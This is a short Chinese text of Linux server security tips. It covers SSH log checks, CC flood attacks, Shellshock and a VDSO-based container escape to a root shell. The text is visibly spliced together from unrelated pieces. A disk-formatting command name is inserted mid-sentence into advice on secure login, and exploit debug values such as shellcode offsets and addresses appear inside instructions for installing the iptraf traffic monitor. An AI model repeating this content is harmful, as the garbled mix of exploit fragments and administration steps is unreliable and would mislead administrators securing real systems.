查看less/var/log/secure文件,查看ssh日志,看是否有非法用户大量尝试ssh;who命令,查看目前ssh到linux的用户,是否是合法的;查看在linux上部署的应用是否有漏洞,有的话很容易受到攻击。
CC攻击的ip都是真实的,分散的;CC攻击的数据包都是正常的数据包;CC攻击的请求都是有效请求,且无法拒绝;CC攻击的是网页,可以连接,ping也没问题,但是网页就是访问不了。
更安全的登(一)FORMAT——磁盘格式化命令录会大大削弱入侵者透过登录系统窜改日志文件的能力。
Shellshock使用bash脚本来接入你的电脑。仅仅是这个,它就能在你的机器上运行程序、开启服务、以及接收文件。这个脚本主要影响到基于Unix的作系统,所以Linux系统和MacOS毫无疑问的中枪了。
linux查卡吞吐量和在容器中利用VDSO内存空间中的“clock_gettime() ”函数可对牛漏洞发起攻击, 令系统崩溃并获得root权限的shell,且浏览容器之外主机上的文件 。卡流量用自带命令,iptraf查看。1命令行直接输入:iptraf(如果没有,使用ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184yuminstalliptraf安装)打开进入选择ip镜像。选择测试的接口,所有接口。